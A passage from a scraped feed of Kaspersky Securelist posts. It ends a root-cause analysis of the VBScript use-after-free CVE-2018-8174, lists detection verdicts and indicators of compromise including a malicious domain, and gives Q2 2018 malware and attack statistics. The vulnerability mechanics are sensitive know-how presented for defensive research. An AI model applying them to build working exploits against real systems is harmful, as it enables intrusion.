(ArrB) is destroyed_\n\nWith this PoC we were able to trigger a Use-after-free vulnerability; both ArrA(1) and ArrB(1) were referencing the same 'ClassVuln' object in memory. This is possible because when \"Erase ArrA\" is called, the vbscript!VbsErase function determines that the type of the object to delete is a SafeArray, and then calls OLEAUT32!SafeArrayDestroy.\n\nIt checks that the pointer to a [tagSafeArray structure](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms221482\\(v=vs.85\\).aspx>) is not NULL and that its reference count, stored in the cLocks field is zero, and then continues to call ReleaseResources.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133315/180508-the-king-is-dead-cve-18-14.png>)\n\n_VARTYPE of ArrA(1) is VT_DISPATCH, so VBScriptClass::Release is called to destruct the object_\n\nReleaseResources, in turn will check the fFeatures flags variable, and since we have an array of VARIANTs, it will subsequently call VariantClear; a function that iterates each member of an array and performs the necessary deinitialization and calls the relevant class destructor if necessary. In this case, VBScriptClass::Release is called to destroy the object correctly and handle destructors like Class_Terminate, since the VARTYPE of ArrA(1) is VT_DISPATCH.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133323/180508-the-king-is-dead-cve-18-15.png>)\n\n_Root cause of CVE-2018-8174 - 'refCount' being checked only once, before TerminateClass function_\n\nThis ends up being the root cause of the vulnerability. Inside the VBScriptClass::Release function, the reference count is checked only once, at the beginning of the function. Even though it can be (and actually is, in the PoC) incremented in an overloaded TerminateClass function, no checks will be made before finally freeing the class object.\n\n[Class_Terminate](<https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/objects-and-classes/object-lifetime-how-objects-are-created-and-destroyed>) is a deprecated method, now replaced by the 'Finalize' procedure. It is used to free acquired resources during object destruction and is executed as soon as object is set to nothing and there are no more references to that object. In our case, the Class_Terminate method is overloaded, and when a call to VBScriptClass::TerminateClass is made, it is dispatched to the overloaded method instead. Inside of that overloaded method, another reference is created to the ArrA(1) member. At this point ArrB(1) references ArrA(1), which holds a soon to be freed ClassVuln object. \n\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133332/180508-the-king-is-dead-cve-18-16.png>)\n\n_Crash, due to calling an invalid virtual method when freeing second object_\n\nAfter the Class_Terminate sub is finished, the object at ArrA(1) is freed, but ArrB(1) still maintains a reference to that freed class object. When the execution continues, and ArrB is erased, the whole cycle repeats, except that this time, ArrB(1) is referencing a freed ClassVuln object, and so we observe a crash when one of the virtual methods in the ClassVuln vtable is called.\n\n### **Conclusion**\n\nIn this write up we analyzed the core reasons behind CVE-2018-8174, a particularly interesting Use-After-Free vulnerability that was possible due to incorrect object lifetime handling in the Class_Terminate VBScript method. The exploitation process is different from what we've seen in exploits for older vulnerabilities (CVE-2016-0189 and CVE-2014-6332) as the Godmode technique is no longer used. The full exploitation chain is as interesting as the vulnerability itself, but is out of scope of this article.\n\nWith CVE-2018-8174 being the first public exploit to use a URL moniker to load an IE exploit in Word, we believe that this technique, unless fixed, will be heavily abused by attackers in the future, as It allows you force IE to load ignoring the default browser settings on a victim's system.\n\nWe expect this vulnerability to become one of the most exploited in the near future, as it won't be long until exploit kit authors start abusing it in both drive-by (via browser) and spear-phishing (via document) campaigns. To stay protected, we recommend applying latest security updates, and using a security solution with [behavior detection capabilities](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>).\n\nIn our opinion this is the same exploit which Qihoo360 Core Security Team called \"Double Kill\" in their [recent publication](<https://weibo.com/ttarticle/p/show?id=2309404230886689265523>). While this exploit is not limited to browser exploitation, it was reported as an IE zero day, which caused certain confusion in the security community.\n\nAfter finding this exploit we immediately shared the relevant information with Microsoft and they confirmed that it is in fact [CVE-2018-8174](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8174>), and received an acknowledgement for the report.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/10092043/180508-the-king-is-dead-cve-18-20.png>)\n\n_This exploit was found in the wild and was used by an APT actor. More information about that APT actor and usage of the exploit is available to customers of Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com_\n\n### **Detection**\n\nKaspersky Lab products successfully detect and block all stages of the exploitation chain and payload with the following verdicts:\n\n * HEUR:Exploit.MSOffice.Generic \u2013 RTF document\n * PDM:Exploit.Win32.Generic - IE exploit \u2013 detection with [Automatic Exploit Prevention technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/automatic-exploit-prevention-aep>)\n * HEUR:Exploit.Script.Generic \u2013 IE exploit\n * HEUR:Trojan.Win32.Generic - Payload\n\n### **IOCs**\n\n * b48ddad351dd16e4b24f3909c53c8901 - RTF document\n * 15eafc24416cbf4cfe323e9c271e71e7 - Internet Explorer exploit (CVE-2018-8174)\n * 1ce4a38b6ea440a6734f7c049f5c47e2 - Payload\n * autosoundcheckers[.]com", "cvss3": {}, "published": "2018-05-09T06:00:56", "type": "securelist", "title": "The King is dead. Long live the King!", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189", "CVE-2017-0199", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-8174"], "modified": "2018-05-09T06:00:56", "id": "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "href": "https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-24T11:03:46", "description": "\n\n## Q2 figures\n\nAccording to KSN:\n\n * Kaspersky Lab solutions blocked 962,947,023 attacks launched from online resources located in 187 countries across the globe.\n * 351,913,075 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users.\n * Ransomware attacks were registered on the computers of 158,921 unique users.\n * Our File Anti-Virus logged 192,053,604 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,744,244 malicious installation packages\n * 61,045 installation packages for mobile banking Trojans\n * 14,119 installation packages for mobile ransomware Trojans.\n\n## Mobile threats\n\n### General statistics\n\nIn Q2 2018, Kaspersky Lab detected 1,744,244 malicious installation packages, which is 421,666 packages more than in the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175855/180803-it-threat-evolution-q2-2018-statistics-1.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q2 2018_\n\n#### **Distribution of detected mobile apps by type**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175922/180803-it-threat-evolution-q2-2018-statistics-2-0.png>)\n\n_Distribution of newly detected mobile apps by type, Q1 2018_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175916/180803-it-threat-evolution-q2-2018-statistics-2.png>)\n\n_Distribution of newly detected mobile apps by type, Q2 2018_\n\nAmong all the threats detected in Q2 2018, the lion's share belonged to potentially unwanted RiskTool apps (55.3%); compared to the previous quarter, their share rose by 6 p.p. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (13%), whose share fell by 7 p.p. Most detected files of this type came from the families Trojan-Dropper.AndroidOS.Piom and Trojan-Dropper.AndroidOS.Hqwar.\n\nThe share of advertising apps continued to decreased by 8%, accounting for 9% (against 11%) of all detected threats.\n\nA remarkable development during the reporting period was that SMS Trojans doubled their share up to 8.5% in Q2 from 4.5% in Q1.\n\n#### **TOP 20 mobile malware**\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool or Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.04 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.17 \n3 | Trojan-Dropper.AndroidOS.Lezok.p | 4.41 \n4 | Trojan.AndroidOS.Agent.rx | 4.11 \n5 | Trojan.AndroidOS.Piom.toe | 3.44 \n6 | Trojan.AndroidOS.Triada.dl | 3.15 \n7 | Trojan.AndroidOS.Piom.tmi | 2.71 \n8 | Trojan.AndroidOS.Piom.sme | 2.69 \n9 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.54 \n10 | Trojan-Downloader.AndroidOS.Agent.ga | 2.42 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 2.25 \n12 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.80 \n13 | Trojan.AndroidOS.Agent.pac | 1.73 \n14 | Trojan.AndroidOS.Dvmap.a | 1.64 \n15 | Trojan-Dropper.AndroidOS.Lezok.b | 1.55 \n16 | Trojan-Dropper.AndroidOS.Tiny.d | 1.37 \n17 | Trojan.AndroidOS.Agent.rt | 1.29 \n18 | Trojan.AndroidOS.Hiddapp.bn | 1.26 \n19 | Trojan.AndroidOS.Piom.rfw | 1.20 \n20 | Trojan-Dropper.AndroidOS.Lezok.t | 1.19 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.04%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). In second place was Trojan.AndroidOS.Boogr.gsh (12.17%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>). Third was Dropper.AndroidOS.Lezok.p (4.41%), followed by a close 0.3 p.p. margin by Trojan.AndroidOS.Agent.rx (4.11%), which was in the third position in Q1.\n\n### **Geography of mobile threats**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175855/180803-it-threat-evolution-q2-2018-statistics-3.png>)\n\n_Map of attempted infections using mobile malware, Q2 2018 _\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | Bangladesh | 31.17 \n2 | China | 31.07 \n3 | Iran | 30.87 \n4 | Nepal | 30.74 \n5 | Nigeria | 25.66 \n6 | India | 25.04 \n7 | Indonesia | 24.05 \n8 | Ivory Coast | 23.67 \n9 | Pakistan | 23.49 \n10 | Tanzania | 22.38 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q2 2018, Bangladesh (31.17%) topped the list by share of mobile users attacked. China (31.07%) came second with a narrow margin. Third and fourth places were claimed respectively by Iran (30.87%) and Nepal (30.74%).\n\nRussia (8.34%) this quarter was down in 38th spot, behind Taiwan (8.48%) and Singapore (8.46%).\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected 61,045 installation packages for mobile banking Trojans, which is 3.2 times more than in Q1 2018. The largest contribution was made by Trojan-Banker.AndroidOS.Hqwar.jck \u2013 this verdict was given to nearly half of detected new banking Trojans. Second came Trojan-Banker.AndroidOS.Agent.dq, accounting for about 5,000 installation packages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175900/180803-it-threat-evolution-q2-2018-statistics-4.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q2 2018_\n\n**TOP 10 mobile bankers**\n\n | **Verdict** | **%*** \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Agent.dq | 17.74 \n2 | Trojan-Banker.AndroidOS.Svpeng.aj | 13.22 \n3 | Trojan-Banker.AndroidOS.Svpeng.q | 8.56 \n4 | Trojan-Banker.AndroidOS.Asacub.e | 5.70 \n5 | Trojan-Banker.AndroidOS.Agent.di | 5.06 \n6 | Trojan-Banker.AndroidOS.Asacub.bo | 4.65 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 3.66 \n8 | Trojan-Banker.AndroidOS.Asacub.bj | 3.03 \n9 | Trojan-Banker.AndroidOS.Hqwar.t | 2.83 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 2.77 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q2 was Trojan-Banker.AndroidOS.Agent.dq (17.74%), closely followed by Trojan-Banker.AndroidOS.Svpeng.aj (13.22%). These two Trojans use phishing windows to steal information about user's banking cards and online banking credentials. Besides, they steal money through abuse of SMS services, including mobile banking. The popular banking malware Trojan-Banker.AndroidOS.Svpeng.q (8.56%) took third place in the rating, moving one notch down from its second place in Q2.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-5.png>)\n\n_Geography of mobile banking threats, Q2 2018_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | **Country*** | **%**** \n---|---|--- \n1 | USA | 0.79 \n2 | Russia | 0.70 \n3 | Poland | 0.28 \n4 | China | 0.28 \n5 | Tajikistan | 0.27 \n6 | Uzbekistan | 0.23 \n7 | Ukraine | 0.18 \n8 | Singapore | 0.16 \n9 | Moldova | 0.14 \n10 | Kazakhstan | 0.13 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nOverall, the rating did not see much change from Q1: Russia (0.70%) and USA (0.79%) swapped places, both remaining in TOP 3.\n\nPoland (0.28%) rose from ninth to third place thanks to activation propagation of two Trojans: Trojan-Banker.AndroidOS.Agent.cw and Trojan-Banker.AndroidOS.Marcher.w. The latter was first detected in November 2017 and uses a toolset typical of banking malware: SMS interception, phishing windows and Device Administrator privileges to ensure its persistence in the system.\n\n### Mobile ransomware Trojans\n\nIn Q2 2018, we detected **14,119** installation packages for mobile ransomware Trojans, which is larger by half than in Q1.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175849/180803-it-threat-evolution-q2-2018-statistics-6.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q2 2018_\n\n | Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Zebt.a | 26.71 \n2 | Trojan-Ransom.AndroidOS.Svpeng.ag | 19.15 \n3 | Trojan-Ransom.AndroidOS.Fusob.h | 15.48 \n4 | Trojan-Ransom.AndroidOS.Svpeng.ae | 5.99 \n5 | Trojan-Ransom.AndroidOS.Egat.d | 4.83 \n6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 4.73 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 4.29 \n8 | Trojan-Ransom.AndroidOS.Small.cm | 3.32 \n9 | Trojan-Ransom.AndroidOS.Small.as | 2.61 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 1.80 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._\n\nThe most popular mobile ransomware is Q2 was Trojan-Ransom.AndroidOS.Zebt.a (26.71%), encountered by more than a quarter of all users who got attacked by this type of malware. Second came Trojan-Ransom.AndroidOS.Svpeng.ag (19.15%), nudging ahead of once-popular Trojan-Ransom.AndroidOS.Fusob.h (15.48%).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175857/180803-it-threat-evolution-q2-2018-statistics-7.png>)\n\n_Geography of mobile ransomware Trojans, Q2 2018_\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans**\n\n | Country* | %** \n---|---|--- \n1 | USA | 0.49 \n2 | Italy | 0.28 \n3 | Kazakhstan | 0.26 \n4 | Belgium | 0.22 \n5 | Poland | 0.20 \n6 | Romania | 0.18 \n7 | China | 0.17 \n8 | Ireland | 0.15 \n9 | Mexico | 0.11 \n10 | Austria | 0.09 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 went to the United States (0.49%); the most active family in this country was Trojan-Ransom.AndroidOS.Svpeng:\n\n | Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 53.53% \n2 | Trojan-Ransom.AndroidOS.Svpeng.ae | 16.37% \n3 | Trojan-Ransom.AndroidOS.Svpeng.snt | 11.49% \n4 | Trojan-Ransom.AndroidOS.Svpeng.ab | 10.84% \n5 | Trojan-Ransom.AndroidOS.Fusob.h | 5.62% \n6 | Trojan-Ransom.AndroidOS.Svpeng.z | 4.57% \n7 | Trojan-Ransom.AndroidOS.Svpeng.san | 4.29% \n8 | Trojan-Ransom.AndroidOS.Svpeng.ac | 2.45% \n9 | Trojan-Ransom.AndroidOS.Svpeng.h | 0.43% \n10 | Trojan-Ransom.AndroidOS.Zebt.a | 0.37% \n \n_* Unique users in USA attacked by this malware as a percentage of all users of Kaspersky Lab's mobile antivirus in this country who were attacked by ransomware Trojans._\n\nItaly (0.28%) came second among countries whose residents were attacked by mobile ransomware. In this country, most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a. Third place was claimed by Kazakhstan (0.63%), where Trojan-Ransom.AndroidOS.Small.cm was the most popular mobile ransomware.\n\n## Attacks on IoT devices\n\nJudging by the data from our [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), brute forcing Telnet passwords is the most popular method of IoT malware self-propagation. However, recently there has been an increase in the number of attacks against other services, such as control ports. These ports are assigned services for remote control over routers \u2013 this feature is in demand e.g. with internet service providers. We have observed attempts to launch attacks on IoT devices via port 8291, which is used by Mikrotik RouterOS control service, and via port 7547 (TR-069), which was used, among other purposes, for managing devices in the Deutsche Telekom network.\n\nIn both cases the nature of attacks was much more sophisticated than plain brute force; in particular, they involved exploits. We are inclined to think that the number of such attacks will only grow in the future on the back of the following two factors:\n\n * Brute forcing a Telnet password is a low-efficiency strategy, as there is a strong competition between threat actors. Each few seconds, there are brute force attempts; once successful, the threat actor blocks such the access to Telnet for all other attackers.\n * After each restart of the device, the attackers have to re-infect it, thus losing part of the botnet and having to reclaim it in a competitive environment.\n\nOn the other hand, the first attacker to exploit a vulnerability will gain access to a large number of device, having spent minimum time.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175929/180803-it-threat-evolution-q2-2018-statistics-8.png>)\n\n_Distribution of attacked services' popularity by number of unique attacking devices, Q2 2018_\n\n### Telnet attacks\n\nThe scheme of attack is as follows: the attackers find a victim device, check if Telnet port is open on it, and launch the password brute forcing routine. As many manufacturers of IoT devices neglect security (for instance, they reserve service passwords on devices and do not leave a possibility for the user to change them routinely), such attacks become successful and may affect entire lines of devices. The infected devices start scanning new segments of networks and infect new, similar devices or workstations in them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-9.png>)\n\n_Geography of IoT devices infected in Telnet attacks, Q2 2018_\n\n#### **TOP 10 countries by shares of IoT devices infected via Telnet**\n\n | Country | %* \n---|---|--- \n1 | Brazil | 23.38 \n2 | China | 17.22 \n3 | Japan | 8.64 \n4 | Russia | 7.22 \n5 | USA | 4.55 \n6 | Mexico | 3.78 \n7 | Greece | 3.51 \n8 | South Korea | 3.32 \n9 | Turkey | 2.61 \n10 | India | 1.71 \n \n_* Infected devices in each specific country as a percentage of all IoT devices that attack via Telnet._\n\nIn Q2, Brazil (23.38%) took the lead in the number of infected devices and, consequently, in the number of Telnet attacks. Next came China (17.22%) by a small margin, and third came Japan (8.64%).\n\nIn these attacks, the threat actors most often downloaded Backdoor.Linux.Mirai.c (15.97%) to the infected devices.\n\n#### **TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**\n\n | Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.c | 15.97 \n2 | Trojan-Downloader.Linux.Hajime.a | 5.89 \n3 | Trojan-Downloader.Linux.NyaDrop.b | 3.34 \n4 | Backdoor.Linux.Mirai.b | 2.72 \n5 | Backdoor.Linux.Mirai.ba | 1.94 \n6 | Trojan-Downloader.Shell.Agent.p | 0.38 \n7 | Trojan-Downloader.Shell.Agent.as | 0.27 \n8 | Backdoor.Linux.Mirai.n | 0.27 \n9 | Backdoor.Linux.Gafgyt.ba | 0.24 \n10 | Backdoor.Linux.Gafgyt.af | 0.20 \n \n_*Proportion of downloads of each specific malware program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks_\n\n### SSH attacks\n\nSuch attacks are launched similarly to Telnet attacks, the only difference being that they require to bots to have an SSH client installed on them to brute force credentials. The SSH protocol is cryptographically protected, so brute forcing passwords require large computational resources. Therefore, self-propagation from IoT devices is inefficient, and full-fledged servers are used to launch attacks. The success of an SSH attack hinges on the device owner or manufacturers' faults; in other words, these are again weak passwords or preset passwords assigned by the manufacturer to an entire line of devices.\n\nChina took the lead in terms of infected devices attacking via SSH. Also, China was second in terms of infected devices attacking via Telnet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-10.png>)\n\n_Geography of IoT devices infected in SSH attacks, Q2 2018_\n\n#### **TOP 10 countries by shares of IoT devices attacked via SSH**\n\n | Country | %* \n---|---|--- \n1 | China | 15.77% \n2 | Vietnam | 11.38% \n3 | USA | 9.78% \n4 | France | 5.45% \n5 | Russia | 4.53% \n6 | Brazil | 4.22% \n7 | Germany | 4.01% \n8 | South Korea | 3.39% \n9 | India | 2.86% \n10 | Romania | 2.23% \n \n_*The proportion of infected devices in each country as a percentage of all infected IoT devices attacking via SSH_\n\n## Online threats in the financial sector\n\n### Q2 events\n\n#### **New banking Trojan DanaBot**\n\nThe Trojan DanaBot was detected in May. It has a modular structure and is capable of loading extra modules with which to intercept traffic, steal passwords and crypto wallets \u2013 generally, a standard feature set for this type of a threat. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojans' main body. DanaBot initially targeted Australian users and financial organizations, however in early April we noticed that it had become active against the financial organizations in Poland.\n\n#### **The peculiar BackSwap technique**\n\nThe banking Trojan BackSwap turned out much more interesting. A majority of similar threats including **Zeus, Cridex **and **Dyreza **intercept the user's traffic either to inject malicious scripts into the banking pages visited by the victim or to redirect it to phishing sites. By contrast, BackSwap uses an innovative technique for injecting malicious scripts: using WinAPI, it emulates keystrokes to open the developer console in the browser, and then it uses this console to inject malicious scripts into web pages. In a later version of BackSwap, malicious scripts are injected via the address bar, using JavaScript protocol URLs.\n\n#### **Carbanak gang leader detained**\n\nOn March 26, Europol announced the arrest of a leader of the cybercrime gang behind Carbanak and Cobalt Goblin. This came as a result of a joint operation between Spain's national police, Europol and FBI, as well as Romanian, Moldovan, Belorussian and Taiwanese authorities and private infosecurity companies. It was expected that the leader's arrest would reduce the group's activity, however recent data show that no appreciable decline has taken place. In May and June, we detected several waves of targeted phishing against banks and processing companies in Eastern Europe. The email writers from Carbanak masquerades as support lines of reputable anti-malware vendors, European Central Bank and other organizations. Such emails contained attached weaponized documents exploiting vulnerabilities CVE-2017-11882 and CVE-2017-8570.\n\n#### **Ransomware Trojan uses Doppelg\u00e4nging technique**\n\nKaspersky Lab experts [detected](<https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/>) a case of the ransomware Trojan SynAck using the Process Doppelg\u00e4nging technique. Malware writers use this complex technique to make it stealthier and complicate its detection by security solutions. This was the first case when it was used in a ransomware Trojan.\n\nAnother remarkable event was the Purga (aka Globe) cryptoware propagation [campaign](<https://securelist.ru/trojan-dimnie-and-ransomware-purga/90272/>), during which this cryptoware, alongside with other malware including a banking Trojan, was loaded to computers infected with the Trojan Dimnie.\n\n### General statistics on financial threats\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. _\n\nIn Q2 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 215,762 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175934/180803-it-threat-evolution-q2-2018-statistics-11.png>)\n\n \n_Number of unique users attacked by financial malware, Q2 2018_\n\n#### **Geography of attacks**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-12.png>)\n\n_Geography of banking malware attacks, Q2 2018_\n\n#### **TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% ****of users attacked**** \n---|---|--- \n1 | Germany | 2.7% \n2 | Cameroon | 1.8% \n3 | Bulgaria | 1.7% \n4 | Greece | 1.6% \n5 | United Arab Emirates | 1.4% \n6 | China | 1.3% \n7 | Indonesia | 1.3% \n8 | Libya | 1.3% \n9 | Togo | 1.3% \n10 | Lebanon | 1.2% \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data.\n\n*Excluded are countries with relatively few Kaspersky Lab' product users (under 10,000). \n** Unique Kaspersky Lab users whose computers were targeted by banking Trojans or ATM/PoS malware as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### **TOP 10 banking malware families**\n\n| Name | Verdicts* | % of attacked users** \n---|---|---|--- \n1 | Nymaim | Trojan.Win32. Nymaim | 27.0% | \n2 | Zbot | Trojan.Win32. Zbot | 26.1% | \n3 | SpyEye | Backdoor.Win32. SpyEye | 15.5% | \n4 | Emotet | Backdoor.Win32. Emotet | 5.3% | \n5 | Caphaw | Backdoor.Win32. Caphaw | 4.7% | \n6 | Neurevt | Trojan.Win32. Neurevt | 4.7% | \n7 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 3.3% | \n8 | Gozi | Trojan.Win32. Gozi | 2.0% | \n9 | Shiz | Backdoor.Win32. Shiz | 1.5% | \n10 | ZAccess | Backdoor.Win32. ZAccess | 1.3% | \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q2 2018, the general makeup of TOP 10 stayed the same, however there were some changes in the ranking. Trojan.Win32.Zbot (26.1%) and Trojan.Win32.Nymaim (27%) remain in the lead after swapping positions. The banking Trojan Emotet ramped up its activity and, accordingly, its share of attacked users from 2.4% to 5.3%. Conversely, Caphaw dramatically downsized its activity to only 4.7% from 15.2% in Q1, taking fifth position in the rating.\n\n### Cryptoware programs\n\n#### **Number of new modifications**\n\nIn Q2, we detected 7,620 new cryptoware modifications. This is higher than in Q1, but still well below last year's numbers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175849/180803-it-threat-evolution-q2-2018-statistics-13.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q2 2018_\n\n#### **Number of users attacked by Trojan cryptors**\n\nIn Q2 2018, Kaspersky Lab products blocked cryptoware attacks on the computers of 158,921 unique users. Our statistics show that cybercriminals' activity declined both against Q1 and on a month-on-month basis during Q2.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175940/180803-it-threat-evolution-q2-2018-statistics-14.png>)\n\n_Number of unique users attacked by cryptors, Q2 2018_\n\n#### **Geography of attacks**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175856/180803-it-threat-evolution-q2-2018-statistics-15.png>)\n\n#### **TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Ethiopia | 2.49 \n2 | Uzbekistan | 1.24 \n3 | Vietnam | 1.21 \n4 | Pakistan | 1.14 \n5 | Indonesia | 1.09 \n6 | China | 1.04 \n7 | Venezuela | 0.72 \n8 | Azerbaijan | 0.71 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe list of TOP 10 countries in Q2 is practically identical to that in Q1. However, some place trading occurred in TOP 10: Ethiopia (2.49%) pushed Uzbekistan (1.24%) down from first to second place, while Pakistan (1.14%) rose to fourth place. Vietnam (1.21%) remained in third position, and Indonesia (1.09%) remained fifth.\n\n#### **TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% ****of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 53.92 | \n2 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.92 | \n3 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 3.81 | \n4 | Shade | Trojan-Ransom.Win32.Shade | 2.40 | \n5 | Crysis | Trojan-Ransom.Win32.Crusis | 2.13 | \n6 | Cerber | Trojan-Ransom.Win32.Zerber | 2.09 | \n7 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 | \n8 | Locky | Trojan-Ransom.Win32.Locky | 1.49 | \n9 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.36 | \n10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.04 | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nWannaCry further extends lead over other cryptor families, its share rising to 53.92% from 38.33% in Q1. Meanwhile, the cybercriminals behind GandCrab (4.92%, emerged only in Q1 2018) put so much effort into its distribution that it rose all the way up to second place in this TOP 10, displacing the polymorphic worm PolyRansom (3.81%). The remaining positions, just like in Q1, are occupied 